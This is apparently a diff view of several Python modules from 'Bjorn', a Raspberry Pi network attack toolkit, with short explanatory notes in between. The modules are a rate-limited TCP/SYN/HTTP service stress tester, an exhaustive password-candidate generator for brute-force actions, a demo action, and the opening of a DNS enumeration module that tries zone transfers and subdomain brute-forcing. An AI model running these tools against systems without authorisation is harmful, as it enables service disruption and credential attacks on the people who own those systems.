b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST-ACK (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: some servers reject HEAD entirely -- retry once with GET
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def __init__(self, shared_data):
self.shared_data = shared_data
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
# 1) Explicit port argument
try:
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")
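The headline number in each report, `degradation_pct`, is a plain percentage increase of the post-stress mean over the pre-stress mean: (post - baseline) / baseline * 100. A standalone restatement of the formula, mirroring `_degradation_pct` with made-up timings:

```python
def degradation_pct(baseline_mean: float, post_mean: float) -> float:
    """Percentage increase from baseline to post-stress; positive = slower."""
    if baseline_mean <= 0:
        return 0.0  # no usable baseline -> make no claim
    return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)

# Baseline connects averaged 10 ms, post-stress 15 ms -> 50% slower.
print(degradation_pct(0.010, 0.015))  # 50.0
# All baseline probes failed -> 0.0 rather than a divide-by-zero.
print(degradation_pct(0.0, 0.015))    # 0.0
```

Negative values are possible too (the service got faster, e.g. caches warmed up during the stress phase), which is why the per-port report keeps the signed value instead of clamping at zero.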

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)
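The `max_candidates` cap in `build_exhaustive_passwords` exists because the keyspace grows geometrically: with a charset of size c, the number of candidates across lengths min_len..max_len is the sum of c^L. A quick check of those sizes (pure arithmetic, no generation):

```python
def keyspace_size(charset_len: int, min_len: int, max_len: int) -> int:
    """Total candidate count for every length in [min_len, max_len]."""
    return sum(charset_len ** ln for ln in range(min_len, max_len + 1))

# Lowercase only (26 chars), lengths 1..3: 26 + 676 + 17576 = 18278 --
# already nine times the default max_candidates of 2000.
print(keyspace_size(26, 1, 3))   # 18278
# Full mix (26 + 26 + 10 + 8 = 70 chars) at length 4 alone:
print(keyspace_size(70, 4, 4))   # 24010000
```

This is why the generator returns early the moment `len(generated) >= max_candidates` instead of materializing the full product: on a Pi Zero, an unbounded `itertools.product` over a mixed charset would never finish.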

234
actions/demo_action.py Normal file
View File

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
# Copy the entry before editing it: dict(base) is shallow, so writing
# into d["interface"] directly would mutate the module-level b_args.
iface = dict(d["interface"])
iface["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if iface.get("default") not in iface["choices"]:
iface["default"] = "auto"
d["interface"] = iface
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()
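The `b_args` schema declares `min`/`max`/`step` for numeric inputs, but nothing in this demo enforces them server-side. A hypothetical validator (not part of the file) that clamps a submitted value against such a schema entry could look like this:

```python
def clamp_arg(schema_entry: dict, value) -> int:
    """Coerce a submitted value into the [min, max] range of a b_args-style
    entry, falling back to the declared default on non-numeric input."""
    try:
        v = int(value)
    except (TypeError, ValueError):
        return int(schema_entry.get("default", 0))
    lo = int(schema_entry.get("min", v))
    hi = int(schema_entry.get("max", v))
    return max(lo, min(v, hi))

port_schema = {"type": "number", "min": 1, "max": 65535, "default": 80}
print(clamp_arg(port_schema, 99999))   # 65535 (clamped to max)
print(clamp_arg(port_schema, "abc"))   # 80    (default on garbage)
print(clamp_arg(port_schema, 443))     # 443   (in range, unchanged)
```

Real actions that read user-supplied values (e.g. berserker_force clamping its rate to `_MAX_RATE`) apply the same idea inline with `max(lo, min(v, hi))`.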

837
actions/dns_pillager.py Normal file
View File

@@ -0,0 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
